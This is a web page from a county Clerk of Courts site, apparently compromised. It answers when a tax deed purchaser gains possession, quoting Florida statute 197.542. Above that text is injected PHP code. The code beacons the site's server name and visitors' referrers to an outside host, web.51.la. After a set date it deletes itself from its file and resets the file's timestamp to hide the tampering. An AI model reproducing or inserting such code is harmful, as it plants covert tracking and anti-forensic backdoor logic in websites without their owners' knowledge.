check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456736233){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776897&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } If I am the successful bidder at a Tax Deed Sale, when am I entitled to possession of the property?
Home Tax Deeds If I am the successful bidder at a Tax Deed Sale, when am I entitled to possession of the property?

More... Quick Links

If I am the successful bidder at a Tax Deed Sale, when am I entitled to possession of the property?

Section 197.542, F.S. states: "Any person, firm, corporation, or county that is the grantee of any Tax
Deed under this law shall be entitled to the immediate possession of the lands described in the Deed.


If demand for possession is refused, the purchaser may apply to the Circuit Court for a Writ of
Assistance upon five days' notice directed to the person refusing to deliver possession. Upon service
of the responsive pleadings, if any, the matter shall proceed as in chancery cases. If the Court finds
for the applicant, an order shall be issued by the Court directing the Sheriff to put the grantee in
possession of the lands."


 
Copyright © 2017 Clerk of Courts. All Rights Reserved.
Joomla! is Free Software released under the GNU/GPL License.
To protect your privacy, please read the Putnam County Email Privacy Policy.

Information on this website does not constitute the Official Court Records maintained by the Clerk.